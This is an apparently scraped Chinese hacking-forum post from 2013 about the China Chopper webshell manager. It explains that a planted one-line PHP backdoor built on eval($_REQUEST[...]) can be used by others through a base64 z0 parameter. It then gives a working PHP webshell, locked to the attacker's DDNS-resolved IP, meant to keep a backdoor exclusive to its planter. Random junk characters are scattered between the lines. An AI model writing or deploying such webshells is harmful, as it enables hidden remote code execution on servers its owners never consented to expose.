中国网络渗透测试联盟

标题: 中国菜刀 maicaidao 网站管理软件 0day [打印本页]

作者: admin    时间: 2013-7-26 12:45
标题: 中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
8 k5 f7 l" N7 ]
1 w6 R& P3 H6 p& S2 w" Y就算你设置了密码,使用了eval($_REQUEST['moyo']);; a6 G/ ~% k/ m6 J- h- H

0 |% n9 u. K# n1 ^& F# V但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门3 z3 L5 U+ E0 X& A7 i! I
! t( M7 A2 h# X( m/ \$ N: [6 A
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
+ f; H: r+ U# F' l& }1 E6 s& \3 p1 x$ h3 L* _$ I/ Q& ^6 u* @
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
: {5 a+ H2 z$ q7 {
% b$ x5 z$ {$ j7 j7 L* l& Q7 A不知道是设计缺陷还是故意留的后门7 k( N# U+ `( f1 E
/ E. d9 T4 `9 q2 d( T. [. b
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用% c) D6 N2 m5 N" n. L" S1 ~/ x

( Q6 ^+ L1 k3 `& P本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org9 M+ u! T  ]* e- `

, a3 u- f+ |, [然后一句话后门这样写
; ]! w2 x, w# Z) A
" d" i# X# o& t% O4 R- r<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
7 f+ z9 p7 i- q: o5 f+ O这样就可以让一句话后门只允许自己的电脑连接了; ]" k5 L8 S# C4 f" e1 I
. g; n+ k6 n& @2 R7 A. O





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2